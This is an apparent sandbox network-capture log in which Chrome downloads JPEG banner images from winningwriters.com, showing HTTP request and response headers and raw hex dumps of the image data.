                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: a6 9b 1b b5 a1 81 f6 ab ae cc 8b d9 e2 45 d0 a1 e7 9e c3 18 18 b4 ed 53 7b c2 f1 b6 b2 1c 25 10 a0 e6 63 87 33 70 4f 69 19 44 fc bf cf 63 26 12 f9 df f8 2d 7d 9d b8 6c 7f 08 4d 43 6b 6e b4 52 82 8b 04 e7 a8 25 58 49 2d 2d c8 4c 1a bd bf df 56 26 20 2a 89 3a a7 e8 ae 94 28 5e 0f 5a 53 23 e9 ff bd 85 d1 dd 8b a7 71 f8 3e e5 e5 c6 5a 89 b7 df 21 fe df ff 60 44 22 28 a1 10 5a 5d 3d d2 30 50 9b 2b 1c a7 28 15 5b f1 fb a9 da 73 cf d2 3a e1 62 67 ec 72 61 9e 4b 01 57 55 94 40 80 4c 77 b7 95 c9 a3 69 a5 11 fa e2 76 51 52 22 4d 93 e8 33 cf 30 f0 a7 3f 63 f6 f4 23 0d 1d 92 49 10 82 c0 be f3 a8 fd c4 e7 21 9d a6 6b fd 5a f4 ae 1e ab 06 b5 48 68 e7 a2 da d2 15 cc 3b 15 e5 b9 1e 7a 3c 86 11 1d 9b 39 ea 86 e2 0a e5 9d 98 86 5c 9b 80 32 62 b1 d8 16 9b 43 25 07 dc f4 9a
                                                                                                                                                                                            Data Ascii: ES{%c3pOiDc&-}lMCknR%XI--LV& *:(^ZS#q>Z!`D"(Z]=0P+([s:bgraKWU@LwivQR"M30?c#I!kZHh;z<9\2bC%
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 53 93 eb 4b ba 41 fb 7a bd 15 a3 bf 23 a1 54 55 8d 79 61 c1 3e 01 cb 01 d7 29 0a bc 3d 10 7f f1 25 db d8 b6 ec 76 3d 5a 94 60 10 65 84 52 9f b1 b0 2d 5c 27 2e db 16 6a 6d 0d 8a d7 8b 59 24 0c 37 fa 56 5b 02 a6 44 ef eb 47 c6 e3 50 5d 9d 4f ab 75 aa 37 16 9a 8a 67 dc 78 f0 78 0b 35 bb 08 cc 8c 4e f2 dd f7 41 0a f4 d5 ab d1 bb bb 2d 71 dc dd 83 de dd 8b f1 e1 0a cc a1 28 32 9d c1 54 3d 79 23 a7 dc 31 2a df cb 89 ac 9e 90 59 eb 31 f2 d9 40 b9 b3 e7 8d a0 72 8f 45 56 3a 8f 94 6b bd 23 22 b3 ef 53 71 2d 71 76 3c 27 84 11 22 fb fe 4b 6b c1 c5 30 0b 8b 0a 89 38 de 71 6d 78 8f 39 0a ad 2e 8c cc 64 d0 7b fb 90 86 81 d6 d0 88 d6 66 45 83 3d 2d 2d 68 ad 2d 28 c1 00 c2 e7 47 ef ec 64 fd f2 15 64 06 07 40 48 d4 ba 5a bc 93 26 22 82 41 fb 67 5b f4 d8 18 1c 24 d3 d3 0b
                                                                                                                                                                                            Data Ascii: SKAz#TUya>)=%v=Z`eR-\'.jmY$7V[DGP]Ou7gxx5NA-q(2T=y#1*Y1@rEV:k#"Sq-qv<'"Kk08qmx9.d{fE=--h-(Gdd@HZ&"Ag[$
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: ef 43 7d b2 36 c3 e5 44 6d df 0e a3 c1 87 5e 5d 6d e6 80 76 38 9a d2 31 45 5f db 30 50 14 05 35 3d 13 61 c4 9f 49 11 6e f0 12 60 18 48 29 69 a8 9d 3b 9b f5 5b c6 21 7c 9c 05 fe 5d bb 10 de 06 c8 74 06 ef 8d f4 3f 13 a4 6c de 57 29 1c bb af 97 97 23 1a 1a 10 a9 a9 6d e6 7e 9d 20 ca 09 b4 0a 7e bf 9f 9d 3b 77 52 5e 5e ce 09 27 9c b0 4f 75 dd 75 d7 5d 2c 5c b8 10 23 ea 21 33 61 c2 04 1c d6 87 c3 6f 0c 86 61 50 52 52 42 71 71 31 bd 7a f5 22 35 35 f5 60 37 a9 cd e1 f1 78 28 2a 2a 42 08 41 cf 9e 3d 0f 76 73 12 f8 0d 22 31 87 12 38 50 a8 a9 a9 a1 b8 b8 98 e4 e4 64 0e 3d f4 d0 83 dd 9c 04 7e a5 90 93 92 71 14 16 ee 5d 6a 28 0b c2 36 4e 59 82 da 7a 02 bb 76 9a 29 a2 d4 66 96 dc 42 20 25 b9 50 f3 b3 01 1d dd eb 0d ab 31 c7 75 09 0e fe db 99 93 43 cd 9a 9f 29 bd f7
                                                                                                                                                                                            Data Ascii: C}6Dm^]mv81E_0P5=aIn`H)i;[!|]t?lW)#m~ ~;wR^^'Ouu],\#!3aoaPRRBqq1z"55`7x(**BA=vs"18Pd=~q]j(6NYzv)fB %P1uC)
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: c7 1e 6b 3b df c6 8d 1b c7 e1 87 1f 1e 63 f1 58 bb 76 2d 6e b7 9b 2c 4b 1a 88 c5 8b 17 db 6a 06 48 92 c4 ab af be 1a 63 01 99 3f 7f 3e 8f 3c f2 08 53 a7 4e 8d 20 92 d3 a7 4f e7 c7 1f 7f 8c a9 c7 e5 72 f1 e1 87 1f 72 de 79 e7 85 cb 0c c3 e0 a3 8f 3e e2 f5 d7 5f 8f b1 1c 3f f3 cc 33 b6 64 fb fd f7 df 0f ff d6 d3 d3 d3 b9 e3 8e 3b d8 b1 63 07 93 26 4d 8a 38 ee 5f ff fa 17 8f 3f fe 78 58 63 61 f9 f2 e5 31 75 81 e9 61 61 7d 1e 8c 19 33 86 89 13 27 32 6d da 34 ea eb eb c3 a2 4e 21 c4 b3 92 be fd f6 db 11 71 95 a3 46 8d e2 89 27 9e e0 f3 cf 3f e7 c7 1f 7f b4 9d 8b f1 d0 16 73 e8 e9 a7 9f b6 dd cc 3c e3 8c 33 f8 f4 d3 4f c3 56 b5 1b 6f bc 91 49 93 26 71 c7 1d 77 c4 1c 3b 71 e2 44 6e bb ed b6 56 59 e0 7c 3e 1f 4f 3c f1 84 ed 77 93 27 4f e6 fa eb af 0f 7f be f5 d6
                                                                                                                                                                                            Data Ascii: k;cXv-n,KjHc?><SN Orry>_?3d;c&M8_?xXca1uaa}3'2m4N!qF'?s<3OVoI&qw;qDnVY|>O<w'O
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 78 f5 d5 57 51 5e 5e 8e ec ec 6c 6c df be 1d 91 91 91 75 1d 86 c7 82 b2 b2 32 c4 c4 c4 e0 fc f9 f3 18 39 72 24 d2 d3 d3 31 76 ec 58 f4 ed db 17 c1 c1 c1 30 18 0c d8 bf 7f 3f 16 2c 58 20 7a bc bd b5 a9 73 e7 ce a2 69 76 52 52 52 f0 fb ef bf 43 a9 54 e2 e7 9f 7f c6 98 31 63 90 96 96 86 a0 a0 20 68 b5 5a 87 0d 8c 9b 37 6f 62 d2 a4 49 48 49 49 01 41 10 d8 b3 67 0f d2 d2 d2 44 2d 08 66 b3 19 eb d6 ad c3 84 09 13 1e 61 24 9c 43 ab 56 ad 44 fb fb f7 df 7f 23 32 32 12 91 91 91 b8 7e fd 3a 7e fb ed 37 5c ba 74 c9 69 b7 c9 b0 b0 30 51 77 d5 84 84 04 2c 59 b2 04 81 81 81 b6 14 28 52 de 2a 6b d7 ae 45 df be 7d 6d 29 70 12 12 12 30 6f de 3c 87 cd 2e 83 c1 80 41 83 06 a1 5f bf 7e e8 d4 a9 13 aa aa aa 70 f2 e4 49 1b b1 f2 f7 f7 c7 b2 65 cb 6c f5 ff fd ef 7f 23 33 33 d3
                                                                                                                                                                                            Data Ascii: xWQ^^llu29r$1vX0?,X zsivRRRCT1c hZ7obIHIIAgD-fa$CVD#22~:~7\ti0Qw,Y(R*kE}m)p0o<.A_~pIel#33
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: ce 91 35 98 24 b9 64 09 b1 3f dc 45 ea b5 d7 90 ba 00 69 17 67 6e 57 55 64 11 c5 75 05 09 a9 14 56 77 17 d2 b2 5c eb 6e 8f 06 4f 28 ef 42 16 2f 5e cc 99 67 9e c9 cb 2f bf cc 33 cf 3c c3 8a 15 2b 68 6b 6b 23 1e 8f 93 cb e5 d0 75 9d 9a 9a 1a 26 4d 9a c4 9c 39 73 98 3f 7f 3e 47 1e 79 64 b1 f6 b4 87 87 87 87 87 87 87 87 c7 f8 23 84 50 e5 8e 5a 5a b0 07 07 95 48 41 b9 34 6f 37 79 0b 9d b3 4c 93 1c 8c 13 3a e4 10 ea 3e f9 49 c2 87 1f 8a d1 dc 8c 28 58 fb 5c 30 9a 9b 09 cc 9a 49 78 de 11 d4 9d 72 0a 89 67 9e 21 76 d7 9f c9 b5 77 81 00 3d 1c a1 f1 fc af 11 5d b0 00 91 b7 56 0e 8d 83 1d f6 fa 87 c4 c8 02 e8 d1 28 75 67 2d 26 b7 75 0b f1 7f 3e 04 42 c7 6c ef 2c db c7 2d d6 57 79 8f ab c4 5a 99 f5 1b c8 b6 6d 25 34 67 8e 4a 22 55 18 93 8b 48 45 08 44 24 82 6f af d9
                                                                                                                                                                                            Data Ascii: 5$d?EignWUduVw\nO(B/^g/3<+hkk#u&M9s?>Gyd#PZZHA4o7yL:>I(X\0Ixrg!vw=]V(ug-&u>Bl,-WyZm%4gJ"UHED$o


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            9192.168.2.164971866.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:05 UTC661OUTGET /graphics/wergle/wergle_2024_top_banner_970_250.jpg HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:05 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:05 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Sun, 29 Oct 2023 19:34:34 GMT
                                                                                                                                                                                            ETag: "24624-608e002e902ff"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 149028
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:05 GMT
                                                                                                                                                                                            Vary: User-Agent
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            2024-11-18 20:00:05 UTC7835INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 01 04 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 06 00 12 01 03 00 01 00 00 00 01 00 00 00 1a 01 05 00 01 00 00 00 b0 00 00 00 1b 01 05 00 01 00 00 00 b8 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 13 02 03 00 01 00 00 00 01 00 00 00 69 87 04 00 01 00 00 00 56 00 00 00 00 00 00 00 07 00 00 90 07 00 04 00 00 00 30 32 33 31 01 91 07 00 04 00 00 00 01 02 03 00 00 a0 07 00 04 00 00 00 30 31 30 30 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 03 00 01 00 00 00 ca 03 00 00 03 a0 03 00 01 00 00 00 fa 00 00 00 86 92 07 00 3b 00 00 00 c0 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 00 41 53 43 49 49 00 00 00 78 72 3a 64 3a 44 41 46 79 71 46 59 65 74 73 73 3a 37 2c 6a 3a 34 30 31 39
                                                                                                                                                                                            Data Ascii: JFIFExifII*(iV02310100;``ASCIIxr:d:DAFyqFYetss:7,j:4019
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 5d d6 d1 06 32 48 23 29 bc 80 11 8f dd e4 0e 05 73 9e 26 f8 a3 f1 2b c4 ff 00 11 bc 29 a7 78 3f e1 c5 f7 fc 23 ba b6 99 a9 dc 78 9e f3 54 d1 26 8a e7 45 99 2d f3 04 41 8b 05 2f 2b b1 8c 80 1b 85 24 1c 1a f2 3f 80 fa 77 c4 8f 06 ff 00 c1 3b f4 4f d9 ab 56 f8 37 e2 7f f8 49 a4 f8 6f ac 69 ba 8c 72 69 85 22 b1 9c da dc f9 68 ee 4e 19 a4 77 8d 11 57 39 2f 93 80 33 5b 2c 75 45 51 c7 75 67 d1 ef a5 90 dc 9d cf 7b f8 57 f1 d3 e1 77 c6 2b 6b 6d 57 e1 dd c5 ec f6 b7 fa 3c 3a b5 9c f7 7e 1e b9 b3 8e ea ce 52 04 73 c4 d3 c4 82 45 3c 7d dc 9c 10 4f 5a a6 7f 68 ff 00 84 12 f8 e3 54 f0 2d 95 de a5 2e a9 a1 6a f6 fa 5e ae 22 f0 ad db c3 6b 73 70 aa d0 c7 24 e2 23 1a 86 0e a4 36 ed bf 30 c9 19 ae 27 f6 11 f0 df 8b 7c 03 f0 87 c1 9f 0f fc 5f 63 e3 08 f5 0d 37 e1 b6 91 65
                                                                                                                                                                                            Data Ascii: ]2H#)s&+)x?#xT&E-A/+$?w;OV7Ioiri"hNwW9/3[,uEQug{Ww+kmW<:~RsE<}OZhT-.j^"ksp$#60'|_c7e
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: bd b4 9d 58 39 8e e1 83 c8 1e 3c 04 75 db c3 03 92 19 a4 dd 58 d3 70 d6 4a eb 5f 5b 2f c0 14 ee f6 dc fa 30 2b ad c9 21 4e 0a 7c dc 74 c1 a4 5c 8b 96 e4 f2 80 93 9e 3a e2 be 6b fd 8c b4 6f 1a 78 97 53 d4 3c 21 f1 4b 5e 3a bd cf c0 ed 7e ef c2 7a 46 a6 b7 93 23 ea bf 22 49 1d ed d2 ee c3 ca 2d de 28 f0 db 86 f1 23 f5 23 1d 06 91 ad 6b 9f 10 ff 00 6d ef 18 fc 33 f8 8f 29 8f 47 f0 df 84 34 ab cf 07 e8 ce ee 90 df 7d a1 a6 17 77 84 02 3c f6 57 44 8b 07 22 31 ce 01 6c d6 f0 c7 b9 d2 8c f9 6d cc ec b5 fc c6 a7 74 9f 73 dc a1 4d b7 33 07 e3 e6 1f fd 7a 7d b2 48 ec c3 61 25 9c 9e 95 f3 9d ed fc 1a 07 ed 73 e0 3f d9 c2 db 5a 99 bc 01 7d e1 2d 7b 51 b4 8e 6d 45 e4 4b dd 6e 1b a4 1f 61 69 4b ee 75 82 17 91 96 12 c7 b6 41 da 00 e4 f5 ef 05 eb 1a ff 00 8a 3e 37 7e cd
                                                                                                                                                                                            Data Ascii: X9<uXpJ_[/0+!N|t\:koxS<!K^:~zF#"I-(##km3)G4}w<WD"1lmtsM3z}Ha%s?Z}-{QmEKnaiKuA>7~
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 24 9d 90 00 7d b9 7d 3f e3 7f 8a fc 15 f0 a7 f6 7a f1 7c 88 97 13 ea 96 ba 1a 6a 76 f2 4d fb e8 63 b7 d6 1f 4f fb 4a 64 e7 f7 96 b7 32 c6 40 18 2a 9c f0 32 39 2b e6 32 8d 48 a5 15 74 ee ff 00 af 43 96 38 f8 b8 a9 3e 9b fc 9d bf a4 7d 7f a1 fc 11 f8 39 e1 5b c8 af b4 6f 85 9a 05 a4 d0 cd 34 d0 5c db e9 91 a9 49 26 05 66 71 81 f2 b3 82 43 1e ac 09 cd 68 78 2b e1 bf 80 3c 00 8f 6f e0 cf 07 e9 da 5e 21 58 31 63 6c b1 e2 15 24 a4 63 1f 75 06 e2 42 8f 94 12 70 39 af 1c fd 96 be 3b 7c 41 f1 ee 9b e0 dd 4b c5 ba 61 b5 ff 00 85 89 7b e2 9f 13 7d 8e 5b 81 31 b2 d2 92 e6 18 74 f8 d5 bf 85 58 15 60 07 04 b9 c0 e7 8f 57 f0 1f 8d d3 c4 d7 be 21 d1 64 9e 0f ed 0f 0c eb f2 e9 da 84 30 82 36 a9 44 9a 07 2a 49 38 78 65 43 e9 9d d8 f4 af 43 0b 5f 07 59 c5 c6 29 37 7b 69 fd
                                                                                                                                                                                            Data Ascii: $}}?z|jvMcOJd2@*29+2HtC8>}9[o4\I&fqChx+<o^!X1cl$cuBp9;|AKa{}[1tX`W!d06D*I8xeCC_Y)7{i
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 59 22 68 a3 4c c9 2d b4 77 71 f9 58 1b 61 88 28 51 bb 07 3e 76 1e 84 29 c6 51 a9 1b 36 f7 fc ed f9 0d e1 e7 ce 92 95 ac ba dd ab ff 00 5d 76 b7 a9 f1 5f c1 df 8d df b4 3e 97 a3 f8 ab c3 b3 fc 14 f8 89 77 e3 6f 17 78 9f fb 77 5f f1 65 97 85 6e 67 b6 82 fa 56 92 28 a6 3b 10 b3 5b d9 c7 3c d2 c6 88 1b cd 99 d7 27 6c 63 3e 81 a2 f8 7f e3 5f ed 79 f1 7a 4d 47 54 d3 af fe 19 7c 05 f8 45 a5 58 e8 77 de 22 f1 0e a0 21 7b 5b 5b 08 ca e2 46 07 2f 77 28 92 56 31 a7 08 f2 ae e3 94 15 fa 7f f1 3b 5a d2 b4 1f 05 ea 1a cf 8c d9 7f b2 6c ad 24 6d 48 4f a9 3c 16 de 46 3e 76 93 19 ca 80 06 06 09 e7 81 5f 89 3f f0 50 3f da 1b e3 57 c7 6f 8f 5a 8f c3 1f 12 78 c2 eb c1 1f 0e b4 7b a7 97 c3 fe 1b 5b 49 17 4d b6 89 63 56 f3 63 8e d2 21 f6 87 7e 5b 7b 0d d8 6f 9b 67 35 ea cf 01
                                                                                                                                                                                            Data Ascii: Y"hL-wqXa(Q>v)Q6]v_>woxw_engV(;[<'lc>_yzMGT|EXw"!{[[F/w(V1;Zl$mHO<F>v_?P?WoZx{[IMcVc!~[{og5
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: af 06 fd 83 fe 35 78 b3 c2 bf 13 3e 3d 59 b7 c4 5b 9f 10 e9 36 5e 34 f0 a6 a3 73 aa 6a e4 45 71 60 2e 26 16 97 71 5d ee da ab 34 31 46 12 67 19 56 31 17 c9 cd 7d c7 f1 9f fe 15 f1 f8 5d ad df 7c 5a f0 f5 96 ad e1 dd 3b 4c b8 bd d4 ac b5 2b 24 b8 8f c8 86 26 91 f0 8e 08 dd b5 48 04 60 fb d7 e3 ef c7 7f da 83 e2 07 ed c5 0e 85 e1 fb bd 6e cf c1 fe 1b f1 84 97 77 ba 86 89 06 9f 6c 6d f4 fd 32 d8 bc b0 dc 4b 05 bb 2c 97 4e b0 a8 c4 93 67 2c cc 06 d1 c5 7c ed 5c 04 a3 8c bc 65 6e be 9f f0 ff 00 91 f3 d9 a5 59 60 25 1a bb bd 76 be 8b cf 7d 97 df f3 3e d7 f8 f9 ff 00 05 93 f8 2f e1 ef 14 5e fc 27 fd 96 2d 27 f8 81 e2 e7 b1 b9 16 5a ae 99 6b 24 da 55 95 d4 6c bb 12 46 52 a6 74 23 79 67 8d b6 a6 d1 92 41 38 c0 f8 3b fb 15 78 fb f6 8d f0 16 a1 f1 ff 00 fe 0a 0d f1
                                                                                                                                                                                            Data Ascii: 5x>=Y[6^4sjEq`.&q]41FgV1}]|Z;L+$&H`nwlm2K,Ng,|\enY`%v}>/^'-'Zk$UlFRt#ygA8;x
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 75 ec 05 2c 00 b2 6f 7e ac 4b 73 d8 53 01 6d b2 10 ae 38 0e 47 d3 fc e6 9b 6e a7 c8 da c7 80 e4 7e 19 a5 b6 c8 8f cc 7e 85 8b 66 99 6f 2b b4 43 ca 4c e5 8e 59 f8 1d 7b 7a d0 03 ed f0 d6 ea b8 ed 8f e9 4d 8d 95 6d 95 5e 45 07 67 73 54 ef db 5f d3 9d 67 b6 b2 8e f2 d0 2e 1e 25 9b ca 9c 3e 79 2a 58 84 61 8f e1 25 4f a1 3d 29 ba 17 89 7c 3b ad f9 91 69 92 7e fe df 1f 69 b4 92 16 49 e0 27 3b 44 91 b0 dc 99 c1 c1 3c 1e c4 d6 4a b4 1c ac 47 b4 8f 37 2f 52 db cd 0b 59 88 da 41 9c 2e 47 d3 14 f9 67 85 a4 8c 09 14 fc e4 9c 1f 6a 73 5c 9c 64 42 e0 63 b8 03 fa d7 cd 9f 1e 3f 6b df 89 1e 2d f8 87 ab fe cd 1f b2 0f c3 eb ad 7b c4 16 10 cf 6b e2 df 17 31 68 6d bc 35 31 4c 46 21 63 1b ad c5 c0 62 0e 30 50 6d 2a 4e 4e 42 ab 59 52 5b 5d f6 31 c5 62 a8 e1 61 cd 51 ef a2 5d
                                                                                                                                                                                            Data Ascii: u,o~KsSm8Gn~~fo+CLY{zMm^EgsT_g.%>y*Xa%O=)|;i~iI';D<JG7/RYA.Ggjs\dBc?k-{k1hm51LF!cb0Pm*NNBYR[]1baQ]
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 59 13 ba e3 47 76 ce 07 73 11 ec 7f d9 e8 6b f4 93 23 a7 be b1 b3 d4 ad 5e c6 fe d9 25 86 45 c3 c6 eb 90 45 72 7b 35 5f 85 f3 ef 59 25 bb f0 fb 1f 99 4f cd 25 8f b8 f5 4f e5 5d 17 87 bc 47 a6 78 9a c0 5f e9 b2 92 01 db 2c 4e 30 f1 b7 75 61 d8 8a bb 2c 51 cd 1b 45 2a 06 56 18 65 61 90 45 00 36 d6 ea de f6 dd 2e ed 26 59 22 91 43 23 a1 c8 60 7b d5 5f 10 f8 7f 4d f1 2e 98 fa 66 a5 0e e5 6e 51 87 0c 8c 3a 30 3d 88 ae 71 fc ff 00 86 1a a0 74 25 bc 3f 75 26 1d 7a fd 8a 46 3d 47 fb 04 fe 55 d8 23 a4 8a 1e 36 05 48 c8 20 f5 a0 0e 73 c1 fa ee a5 6b 7d 27 83 3c 53 2e eb eb 75 dd 6f 70 46 05 dc 5d 9c 7b 8e f5 bb a9 69 d6 7a b5 8c ba 6d fc 02 48 66 42 b2 23 77 15 99 e3 4f 0c be bd 62 97 7a 74 82 1d 46 c9 fc db 1b 8c 7d d6 1f c2 7f d9 3d 0d 4d e1 0f 12 47 e2 6d 1d 6f
                                                                                                                                                                                            Data Ascii: YGvsk#^%EEr{5_Y%O%O]Gx_,N0ua,QE*VeaE6.&Y"C#`{_M.fnQ:0=qt%?u&zF=GU#6H sk}'<S.uopF]{izmHfB#wObztF}=MGmo
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 13 41 f8 97 e0 70 33 fd bc 9f f7 e6 4f fe 26 bc df fb 20 36 33 9c 8f 6a 46 d1 d7 39 c7 e9 4b fe 22 ee 77 ff 00 3e 69 fd d2 ff 00 e4 8a ff 00 88 09 c3 f6 fe 3d 6f be 1f fc 81 e9 3f f0 b2 bc 11 9c 7f 6e a7 fd f9 7f fe 26 94 7c 48 f0 49 ff 00 98 f2 7f df a7 ff 00 e2 6b cd 46 8e bc 0c f7 f4 ae 8f 47 f8 2d e3 3d 6b c3 17 3e 30 b6 d3 0a 58 db 4c 91 99 a7 75 8d 5d 98 37 0a 58 8c 9f 97 a0 f5 a6 bc 5b cf 1b d2 8d 3f ba 7f fc 91 86 27 c0 fe 15 c1 c1 4a be 2a ac 53 69 2b ca 9a bb 7a 25 f0 1b 7a c7 8a be 17 6b d0 1b 5d 5e f6 da 75 c7 f1 db b9 23 e8 76 e4 57 19 3f c4 ff 00 06 78 0f 56 3a 6f 86 7e 23 c4 e3 a8 d1 b5 85 96 3d e3 d2 19 1d 40 27 d8 66 ac bf c3 6d 75 17 77 d8 94 e7 9c 2b 8a cc d5 bc 10 af 01 b4 d7 34 65 92 22 7e 68 ee 20 0c 84 fe 20 8a a5 e2 de 76 be 2a 14
                                                                                                                                                                                            Data Ascii: Ap3O& 63jF9K"w>i=o?n&|HIkFG-=k>0XLu]7X[?'J*Si+z%zk]^u#vW?xV:o~#=@'fmuw+4e"~h v*
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 1e 31 c6 7a 74 b6 5f b2 bf c1 7b 42 24 9b c3 d7 57 4e ad b8 3d d6 a9 3b 1c fd 37 81 f8 62 bc 8e 17 a9 f5 bc 83 0d 5a 2b 95 38 a7 63 fd 2e e1 be 2e cb 7f d5 9c 2c f1 57 95 59 41 39 72 ab d9 dd f7 68 f8 97 53 f0 eb f8 17 e1 5d 85 c7 96 df 62 d6 3c 38 da b6 8d 77 13 79 72 5a 6a 91 c0 2e 1e 31 80 08 25 c1 95 0f 5e 24 53 c0 19 d7 f8 c1 a6 4b ad fc 45 d2 1f 51 98 31 d3 2f ac 2f 65 2a 30 b2 5c cd 14 81 4a fb 05 8e 76 fc ab d4 3c 59 e0 5d 03 40 5d 47 e0 b7 8b 34 98 ae 34 8d 23 5a 64 5b 3b 85 c8 6d 3a e1 99 ed 65 56 3f 30 29 b9 a2 dc 08 21 a1 6e 6b c9 35 9d 23 58 f0 8e a9 65 e1 bd 75 a4 ba 9b 4b b8 d3 2d 92 72 fb ff 00 70 25 b9 82 12 5b bb 08 9c 64 fa 9a fd 3e 14 e9 3e 69 c3 ed 6b f3 71 7a ff 00 5d 4f f1 13 c5 8f 10 33 de 22 cc 70 fc 31 9f 47 fe 14 b2 29 e3 70 ca
                                                                                                                                                                                            Data Ascii: 1zt_{B$WN=;7bZ+8c..,WYA9rhS]b<8wyrZj.1%^$SKEQ1//e*0\Jv<Y]@]G44#Zd[;m:eV?0)!nk5#XeuK-rp%[d>>ikqz]O3"p1G)p


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            10192.168.2.164971966.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:05 UTC906OUTGET /graphics/advertising/origin_story_banner_for_ww_2408.jpg HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:05 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:05 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Sun, 18 Aug 2024 15:34:11 GMT
                                                                                                                                                                                            ETag: "1be03-61ff6ec8f6668"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 114179
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:05 GMT
                                                                                                                                                                                            Vary: User-Agent
                                                                                                                                                                                            Content-Type: image/jpeg
